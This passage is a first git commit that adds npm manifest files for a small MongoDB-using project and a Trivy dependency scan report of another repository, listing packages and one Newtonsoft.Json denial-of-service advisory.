commit ae7c9e080321619e5980f7cabb065ddf0dad1693 Author: NishantRajputRN Date: Wed May 13 17:36:41 2026 +0530 first commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..c2658d7 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +node_modules/ diff --git a/package-lock.json b/package-lock.json new file mode 100644 index 0000000..5b42f45 --- /dev/null +++ b/package-lock.json @@ -0,0 +1,160 @@ +{ + "name": "dsa", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "dsa", + "dependencies": { + "mongodb": "^6.12.0" + } + }, + "node_modules/@mongodb-js/saslprep": { + "version": "1.4.11", + "resolved": "https://registry.npmjs.org/@mongodb-js/saslprep/-/saslprep-1.4.11.tgz", + "integrity": "sha512-o9rAHc0IpIjuPSxRutWpE1F62x7n+4mVS4rCNHkzhIUMQcc18bb6xEq5wd2NdN0WjepIyXIppRshYI2kQDOZVA==", + "license": "MIT", + "dependencies": { + "sparse-bitfield": "^3.0.3" + } + }, + "node_modules/@types/webidl-conversions": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/@types/webidl-conversions/-/webidl-conversions-7.0.3.tgz", + "integrity": "sha512-CiJJvcRtIgzadHCYXw7dqEnMNRjhGZlYK05Mj9OyktqV8uVT8fD2BFOB7S1uwBE3Kj2Z+4UyPmFw/Ixgw/LAlA==", + "license": "MIT" + }, + "node_modules/@types/whatwg-url": { + "version": "11.0.5", + "resolved": "https://registry.npmjs.org/@types/whatwg-url/-/whatwg-url-11.0.5.tgz", + "integrity": "sha512-coYR071JRaHa+xoEvvYqvnIHaVqaYrLPbsufM9BF63HkwI5Lgmy2QR8Q5K/lYDYo5AK82wOvSOS0UsLTpTG7uQ==", + "license": "MIT", + "dependencies": { + "@types/webidl-conversions": "*" + } + }, + "node_modules/bson": { + "version": "6.10.4", + "resolved": "https://registry.npmjs.org/bson/-/bson-6.10.4.tgz", + "integrity": "sha512-WIsKqkSC0ABoBJuT1LEX+2HEvNmNKKgnTAyd0fL8qzK4SH2i9NXg+t08YtdZp/V9IZ33cxe3iV4yM0qg8lMQng==", + "license": "Apache-2.0", + "engines": { + "node": ">=16.20.1" + } + }, + "node_modules/memory-pager": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/memory-pager/-/memory-pager-1.5.0.tgz", + "integrity": "sha512-ZS4Bp4r/Zoeq6+NLJpP+0Zzm0pR8whtGPf1XExKLJBAczGMnSi3It14OiNCStjQjM6NU1okjQGSxgEZN8eBYKg==", + "license": "MIT" + }, + "node_modules/mongodb": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/mongodb/-/mongodb-6.21.0.tgz", + "integrity": "sha512-URyb/VXMjJ4da46OeSXg+puO39XH9DeQpWCslifrRn9JWugy0D+DvvBvkm2WxmHe61O/H19JM66p1z7RHVkZ6A==", + "license": "Apache-2.0", + "dependencies": { + "@mongodb-js/saslprep": "^1.3.0", + "bson": "^6.10.4", + "mongodb-connection-string-url": "^3.0.2" + }, + "engines": { + "node": ">=16.20.1" + }, + "peerDependencies": { + "@aws-sdk/credential-providers": "^3.188.0", + "@mongodb-js/zstd": "^1.1.0 || ^2.0.0", + "gcp-metadata": "^5.2.0", + "kerberos": "^2.0.1", + "mongodb-client-encryption": ">=6.0.0 <7", + "snappy": "^7.3.2", + "socks": "^2.7.1" + }, + "peerDependenciesMeta": { + "@aws-sdk/credential-providers": { + "optional": true + }, + "@mongodb-js/zstd": { + "optional": true + }, + "gcp-metadata": { + "optional": true + }, + "kerberos": { + "optional": true + }, + "mongodb-client-encryption": { + "optional": true + }, + "snappy": { + "optional": true + }, + "socks": { + "optional": true + } + } + }, + "node_modules/mongodb-connection-string-url": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/mongodb-connection-string-url/-/mongodb-connection-string-url-3.0.2.tgz", + "integrity": "sha512-rMO7CGo/9BFwyZABcKAWL8UJwH/Kc2x0g72uhDWzG48URRax5TCIcJ7Rc3RZqffZzO/Gwff/jyKwCU9TN8gehA==", + "license": "Apache-2.0", + "dependencies": { + "@types/whatwg-url": "^11.0.2", + "whatwg-url": "^14.1.0 || ^13.0.0" + } + }, + "node_modules/punycode": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/sparse-bitfield": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/sparse-bitfield/-/sparse-bitfield-3.0.3.tgz", + "integrity": "sha512-kvzhi7vqKTfkh0PZU+2D2PIllw2ymqJKujUcyPMd9Y75Nv4nPbGJZXNhxsgdQab2BmlDct1YnfQCguEvHr7VsQ==", + "license": "MIT", + "dependencies": { + "memory-pager": "^1.0.2" + } + }, + "node_modules/tr46": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-5.1.1.tgz", + "integrity": "sha512-hdF5ZgjTqgAntKkklYw0R03MG2x/bSzTtkxmIRw/sTNV8YXsCJ1tfLAX23lhxhHJlEf3CRCOCGGWw3vI3GaSPw==", + "license": "MIT", + "dependencies": { + "punycode": "^2.3.1" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/webidl-conversions": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-7.0.0.tgz", + "integrity": "sha512-VwddBukDzu71offAQR975unBIGqfKZpM+8ZX6ySk8nYhVoo5CYaZyzt3YBvYtRtO+aoGlqxPg/B87NGVZ/fu6g==", + "license": "BSD-2-Clause", + "engines": { + "node": ">=12" + } + }, + "node_modules/whatwg-url": { + "version": "14.2.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-14.2.0.tgz", + "integrity": "sha512-De72GdQZzNTUBBChsXueQUnPKDkg/5A5zp7pFDuQAj5UFoENpiACU0wlCvzpAGnTkj++ihpKwKyYewn/XNUbKw==", + "license": "MIT", + "dependencies": { + "tr46": "^5.1.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=18" + } + } + } +} diff --git a/package.json b/package.json new file mode 100644 index 0000000..b4a95c8 --- /dev/null +++ b/package.json @@ -0,0 +1,7 @@ +{ + "name": "dsa", + "private": true, + "dependencies": { + "mongodb": "^6.12.0" + } +} diff --git a/report.json b/report.json new file mode 100644 index 0000000..0326037 --- /dev/null +++ b/report.json @@ -0,0 +1,65363 @@ +{ + "SchemaVersion": 2, + "Trivy": { + "Version": "0.70.0" + }, + "ReportID": "019dd7f5-d831-7495-b12b-161a0b9880c9", + "CreatedAt": "2026-04-29T06:38:26.353303227Z", + "ArtifactID": "sha256:83118b6a5e1f8ba83a75c6503b5586e4e1f437b6fb58f9643077c2e420e9b407", + "ArtifactName": "/home/azureuser/performics_main", + "ArtifactType": "repository", + "Metadata": { + "RepoURL": "https://git.parinaam.in/bunty/performics_main.git", + "Branch": "main", + "Commit": "a4c826246ec9a52393caa3474bf191f667f72682", + "CommitMsg": "change fix", + "Author": "anitak \u003canita.kardam@cpmindia.com\u003e", + "Committer": "anitak \u003canita.kardam@cpmindia.com\u003e" + }, + "Results": [ + { + "Target": "node_modules/@react-native-async-storage/async-storage/windows/ReactNativeAsyncStorage/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "fd7f611d158b0a3e" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-async-storage/async-storage/windows/ReactNativeAsyncStorage61/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.190730.2", + "UID": "d924123dec86979c" + }, + "Version": "2.0.190730.2", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-clipboard/clipboard/windows/Clipboard/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "b3d8c497f9dc7f9e" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-community/checkbox/ios/Podfile.lock", + "Class": "lang-pkgs", + "Type": "cocoapods", + "Packages": [ + { + "ID": "BEMCheckBox@1.4.1", + "Name": "BEMCheckBox", + "Identifier": { + "PURL": "pkg:cocoapods/BEMCheckBox@1.4.1", + "UID": "4fab759a82185d9b" + }, + "Version": "1.4.1", + "AnalyzedBy": "cocoapods" + } + ] + }, + { + "Target": "node_modules/@react-native-community/checkbox/windows/CheckboxWindows/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "717dd530739193e7" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-community/datetimepicker/windows/DateTimePickerWindows/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "53d5bcd438a5991d" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-community/netinfo/windows/RNCNetInfoCPP/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", + "UID": "162b18d28bdd1ea9" + }, + "Version": "2.0.210312.4", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-community/slider/windows/SliderWindows/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "4d8188a1663aa607" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-community/slider/windows/SliderWindows/packages.lock.json", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "ID": "Microsoft.UI.Xaml@2.8.0", + "Name": "Microsoft.UI.Xaml", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.8.0", + "UID": "71e6b1080a2f8c22" + }, + "Version": "2.8.0", + "Relationship": "direct", + "DependsOn": [ + "Microsoft.Web.WebView2@1.0.1264.42" + ], + "Locations": [ + { + "StartLine": 5, + "EndLine": 13 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", + "UID": "c2629277c3747e7" + }, + "Version": "2.0.230706.1", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 14, + "EndLine": 19 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.JavaScript.Hermes@0.1.23", + "Name": "Microsoft.JavaScript.Hermes", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.JavaScript.Hermes@0.1.23", + "UID": "77418eb3d2820da3" + }, + "Version": "0.1.23", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 25, + "EndLine": 29 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Web.WebView2@1.0.1264.42", + "Name": "Microsoft.Web.WebView2", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.1264.42", + "UID": "c042a295d658947" + }, + "Version": "1.0.1264.42", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 30, + "EndLine": 34 + }, + { + "StartLine": 71, + "EndLine": 75 + }, + { + "StartLine": 78, + "EndLine": 82 + }, + { + "StartLine": 85, + "EndLine": 89 + }, + { + "StartLine": 92, + "EndLine": 96 + }, + { + "StartLine": 99, + "EndLine": 103 + }, + { + "StartLine": 106, + "EndLine": 110 + }, + { + "StartLine": 113, + "EndLine": 117 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "boost@1.83.0", + "Name": "boost", + "Identifier": { + "PURL": "pkg:nuget/boost@1.83.0", + "UID": "3f63a4b686c400fb" + }, + "Version": "1.83.0", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20, + "EndLine": 24 + } + ], + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/@react-native-picker/picker/windows/ReactNativePicker/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.UI.Xaml", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.3.191129002", + "UID": "db8275fe292c5d3b" + }, + "Version": "2.3.191129002", + "AnalyzedBy": "nuget" + }, + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", + "UID": "c452b94ed875d6f6" + }, + "Version": "2.0.210312.4", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-blob-util/windows/ReactNativeBlobUtil/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200615.7", + "UID": "37845974296c7778" + }, + "Version": "2.0.200615.7", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-blob-util/windows/ReactNativeBlobUtil/packages.lock.json", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "ID": "Microsoft.ReactNative@0.76.13-Fabric", + "Name": "Microsoft.ReactNative", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.ReactNative@0.76.13-Fabric", + "UID": "cc6372bfd09d2c22" + }, + "Version": "0.76.13-Fabric", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 11, + "EndLine": 16 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.ReactNative.Cxx@0.76.13-Fabric", + "Name": "Microsoft.ReactNative.Cxx", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.ReactNative.Cxx@0.76.13-Fabric", + "UID": "d474c554a5fb05f9" + }, + "Version": "0.76.13-Fabric", + "Relationship": "direct", + "DependsOn": [ + "Microsoft.ReactNative@0.76.13-Fabric" + ], + "Locations": [ + { + "StartLine": 17, + "EndLine": 25 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.VCRTForwarders.140@1.0.2-rc", + "Name": "Microsoft.VCRTForwarders.140", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.VCRTForwarders.140@1.0.2-rc", + "UID": "7f2de1e942193975" + }, + "Version": "1.0.2-rc", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 26, + "EndLine": 31 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", + "UID": "efa85b45465745b1" + }, + "Version": "2.0.230706.1", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 32, + "EndLine": 37 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.WindowsAppSDK@1.7.250401001", + "Name": "Microsoft.WindowsAppSDK", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.WindowsAppSDK@1.7.250401001", + "UID": "b938986aaaf2e36e" + }, + "Version": "1.7.250401001", + "Relationship": "direct", + "DependsOn": [ + "Microsoft.Web.WebView2@1.0.2903.40", + "Microsoft.Windows.SDK.BuildTools@10.0.22621.756" + ], + "Locations": [ + { + "StartLine": 38, + "EndLine": 47 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "boost@1.83.0", + "Name": "boost", + "Identifier": { + "PURL": "pkg:nuget/boost@1.83.0", + "UID": "6bf8207fe0586f70" + }, + "Version": "1.83.0", + "Relationship": "direct", + "Locations": [ + { + "StartLine": 5, + "EndLine": 10 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Web.WebView2@1.0.2903.40", + "Name": "Microsoft.Web.WebView2", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.2903.40", + "UID": "922ece54230fa40b" + }, + "Version": "1.0.2903.40", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 48, + "EndLine": 52 + } + ], + "AnalyzedBy": "nuget" + }, + { + "ID": "Microsoft.Windows.SDK.BuildTools@10.0.22621.756", + "Name": "Microsoft.Windows.SDK.BuildTools", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.SDK.BuildTools@10.0.22621.756", + "UID": "d8b6f5197f744156" + }, + "Version": "10.0.22621.756", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 53, + "EndLine": 57 + } + ], + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-device-info/windows/RNDeviceInfoCPP/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", + "UID": "b51e8a92b9c33ce" + }, + "Version": "2.0.210312.4", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-fs/windows/RNFS.Net46/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Newtonsoft.Json", + "Identifier": { + "PURL": "pkg:nuget/Newtonsoft.Json@10.0.3", + "UID": "95404bb7acc2ec78" + }, + "Version": "10.0.3", + "AnalyzedBy": "nuget" + }, + { + "Name": "Syroot.Windows.IO.KnownFolders", + "Identifier": { + "PURL": "pkg:nuget/Syroot.Windows.IO.KnownFolders@1.2.1", + "UID": "2f78fe9d903d5246" + }, + "Version": "1.2.1", + "AnalyzedBy": "nuget" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2024-21907", + "VendorIDs": [ + "GHSA-5crp-9r3c-p9vr" + ], + "PkgName": "Newtonsoft.Json", + "PkgIdentifier": { + "PURL": "pkg:nuget/Newtonsoft.Json@10.0.3", + "UID": "95404bb7acc2ec78" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "13.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-21907", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory NuGet", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anuget" + }, + "Fingerprint": "sha256:3a37a559f391dddad67fb1371ccdb67acd0fb14989aa3ecbf46cab9c1cff81b1", + "Title": "Improper Handling of Exceptional Conditions in Newtonsoft.Json", + "Description": "Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-755" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://alephsecurity.com/2018/10/22/StackOverflowException", + "https://alephsecurity.com/2018/10/22/StackOverflowException/", + "https://alephsecurity.com/vulns/aleph-2018004", + "https://github.com/JamesNK/Newtonsoft.Json", + "https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66", + "https://github.com/JamesNK/Newtonsoft.Json/issues/2457", + "https://github.com/JamesNK/Newtonsoft.Json/pull/2462", + "https://github.com/advisories/GHSA-5crp-9r3c-p9vr", + "https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678", + "https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr" + ], + "PublishedDate": "2024-01-03T16:15:08.793Z", + "LastModifiedDate": "2025-11-28T23:15:47.937Z" + } + ] + }, + { + "Target": "node_modules/react-native-gif/ios/RNFLAnimatedImage/Podfile.lock", + "Class": "lang-pkgs", + "Type": "cocoapods", + "Packages": [ + { + "ID": "FLAnimatedImage@1.0.14", + "Name": "FLAnimatedImage", + "Identifier": { + "PURL": "pkg:cocoapods/FLAnimatedImage@1.0.14", + "UID": "5139c8e5cb6eebd2" + }, + "Version": "1.0.14", + "AnalyzedBy": "cocoapods" + } + ] + }, + { + "Target": "node_modules/react-native-linear-gradient/windows/BVLinearGradient/BVLinearGradient/packages.config", + "Class": "lang-pkgs", + "Type": "nuget", + "Packages": [ + { + "Name": "Microsoft.Windows.CppWinRT", + "Identifier": { + "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", + "UID": "2838d80e889c9868" + }, + "Version": "2.0.200316.3", + "AnalyzedBy": "nuget" + } + ] + }, + { + "Target": "node_modules/react-native-orientation-locker/example/ios/Podfile.lock", + "Class": "lang-pkgs", + "Type": "cocoapods", + "Packages": [ + { + "ID": "CocoaAsyncSocket@7.6.4", + "Name": "CocoaAsyncSocket", + "Identifier": { + "PURL": "pkg:cocoapods/CocoaAsyncSocket@7.6.4", + "UID": "88f4b479427ed0ed" + }, + "Version": "7.6.4", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "CocoaLibEvent@1.0.0", + "Name": "CocoaLibEvent", + "Identifier": { + "PURL": "pkg:cocoapods/CocoaLibEvent@1.0.0", + "UID": "d43da57eb59a556d" + }, + "Version": "1.0.0", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "DoubleConversion@1.1.6", + "Name": "DoubleConversion", + "Identifier": { + "PURL": "pkg:cocoapods/DoubleConversion@1.1.6", + "UID": "303e8bead94443a3" + }, + "Version": "1.1.6", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FBLazyVector@0.63.2", + "Name": "FBLazyVector", + "Identifier": { + "PURL": "pkg:cocoapods/FBLazyVector@0.63.2", + "UID": "f81bee5811420c07" + }, + "Version": "0.63.2", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FBReactNativeSpec@0.63.2", + "Name": "FBReactNativeSpec", + "Identifier": { + "PURL": "pkg:cocoapods/FBReactNativeSpec@0.63.2", + "UID": "5e1a286816a7f779" + }, + "Version": "0.63.2", + "DependsOn": [ + "Folly@2020.01.13.00", + "RCTRequired@0.63.2", + "RCTTypeSafety@0.63.2", + "React-Core@0.63.2", + "React-jsi@0.63.2", + "ReactCommon/turbomodule/core@0.63.2" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Flipper@0.41.5", + "Name": "Flipper", + "Identifier": { + "PURL": "pkg:cocoapods/Flipper@0.41.5", + "UID": "1a5c582e899d9569" + }, + "Version": "0.41.5", + "DependsOn": [ + "Flipper-Folly@2.2.0", + "Flipper-RSocket@1.1.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Flipper-DoubleConversion@1.1.7", + "Name": "Flipper-DoubleConversion", + "Identifier": { + "PURL": "pkg:cocoapods/Flipper-DoubleConversion@1.1.7", + "UID": "49e35caaa3d46a38" + }, + "Version": "1.1.7", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Flipper-Folly@2.2.0", + "Name": "Flipper-Folly", + "Identifier": { + "PURL": "pkg:cocoapods/Flipper-Folly@2.2.0", + "UID": "5d0b8f0be255b001" + }, + "Version": "2.2.0", + "DependsOn": [ + "boost-for-react-native@1.63.0", + "CocoaLibEvent@1.0.0", + "Flipper-DoubleConversion@1.1.7", + "Flipper-Glog@0.3.6", + "OpenSSL-Universal@1.0.2.19" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Flipper-Glog@0.3.6", + "Name": "Flipper-Glog", + "Identifier": { + "PURL": "pkg:cocoapods/Flipper-Glog@0.3.6", + "UID": "6c5615e8942962f7" + }, + "Version": "0.3.6", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Flipper-PeerTalk@0.0.4", + "Name": "Flipper-PeerTalk", + "Identifier": { + "PURL": "pkg:cocoapods/Flipper-PeerTalk@0.0.4", + "UID": "f61fe2959706cc69" + }, + "Version": "0.0.4", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "Flipper-RSocket@1.1.0", + "Name": "Flipper-RSocket", + "Identifier": { + "PURL": "pkg:cocoapods/Flipper-RSocket@1.1.0", + "UID": "788a71a69e9f2319" + }, + "Version": "1.1.0", + "DependsOn": [ + "Flipper-Folly@2.2.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit@0.41.5", + "Name": "FlipperKit", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5", + "UID": "9aae177bcca7d4ac" + }, + "Version": "0.41.5", + "DependsOn": [ + "FlipperKit/Core@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/Core@0.41.5", + "Name": "FlipperKit/Core", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#Core", + "UID": "2593a5c058e9d60e" + }, + "Version": "0.41.5", + "DependsOn": [ + "Flipper@0.41.5", + "FlipperKit/CppBridge@0.41.5", + "FlipperKit/FBCxxFollyDynamicConvert@0.41.5", + "FlipperKit/FBDefines@0.41.5", + "FlipperKit/FKPortForwarding@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/CppBridge@0.41.5", + "Name": "FlipperKit/CppBridge", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#CppBridge", + "UID": "f169bd9d6afc9801" + }, + "Version": "0.41.5", + "DependsOn": [ + "Flipper@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FBCxxFollyDynamicConvert@0.41.5", + "Name": "FlipperKit/FBCxxFollyDynamicConvert", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FBCxxFollyDynamicConvert", + "UID": "fac54c27ea640850" + }, + "Version": "0.41.5", + "DependsOn": [ + "Flipper-Folly@2.2.0" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FBDefines@0.41.5", + "Name": "FlipperKit/FBDefines", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FBDefines", + "UID": "adadc124a0a1cec8" + }, + "Version": "0.41.5", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FKPortForwarding@0.41.5", + "Name": "FlipperKit/FKPortForwarding", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FKPortForwarding", + "UID": "a1da406881b7c1a7" + }, + "Version": "0.41.5", + "DependsOn": [ + "CocoaAsyncSocket@7.6.4", + "Flipper-PeerTalk@0.0.4" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FlipperKitHighlightOverlay@0.41.5", + "Name": "FlipperKit/FlipperKitHighlightOverlay", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitHighlightOverlay", + "UID": "52dee0a82cb0c4a" + }, + "Version": "0.41.5", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FlipperKitLayoutPlugin@0.41.5", + "Name": "FlipperKit/FlipperKitLayoutPlugin", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitLayoutPlugin", + "UID": "cd13064fd4d0c0bc" + }, + "Version": "0.41.5", + "DependsOn": [ + "FlipperKit/Core@0.41.5", + "FlipperKit/FlipperKitHighlightOverlay@0.41.5", + "FlipperKit/FlipperKitLayoutTextSearchable@0.41.5", + "YogaKit@1.18.1" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FlipperKitLayoutTextSearchable@0.41.5", + "Name": "FlipperKit/FlipperKitLayoutTextSearchable", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitLayoutTextSearchable", + "UID": "18604e7de92da30d" + }, + "Version": "0.41.5", + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FlipperKitNetworkPlugin@0.41.5", + "Name": "FlipperKit/FlipperKitNetworkPlugin", + "Identifier": { + "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitNetworkPlugin", + "UID": "25965d4ad795bf8a" + }, + "Version": "0.41.5", + "DependsOn": [ + "FlipperKit/Core@0.41.5" + ], + "AnalyzedBy": "cocoapods" + }, + { + "ID": "FlipperKit/FlipperKitReactPlugin@0.41.5", + "Name": "FlipperKit/FlipperKitReactPlugin", + "Identifier": { + "PURL": 